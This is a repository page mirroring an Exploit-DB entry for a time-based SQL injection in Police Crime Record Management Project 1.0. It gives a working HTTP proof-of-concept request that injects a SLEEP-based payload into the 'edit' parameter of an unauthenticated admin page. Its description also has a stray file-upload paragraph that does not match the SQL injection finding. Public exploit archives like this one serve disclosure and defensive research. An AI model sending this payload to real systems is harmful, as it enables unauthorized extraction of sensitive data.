bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50327.txt
Offensive Security c18c22e3d9 DB: 2021-09-24 
8 changes to exploits/shellcodes

Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)
Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control
Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)
WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
Budget and Expense Tracker System 1.0 - Arbitrary File Upload
Police Crime Record Management Project 1.0 - Time Based SQLi
2021-09-24 05:02:08 +00:00

23 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Tested on: Linux
# Version: 1.0
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
The application suffers from an unauthenticated SQL Injection vulnerability.Input passed through 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.
# PoC request
GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
Upgrade-Insecure-Requests: 1
Reference in a new issue View git blame Copy permalink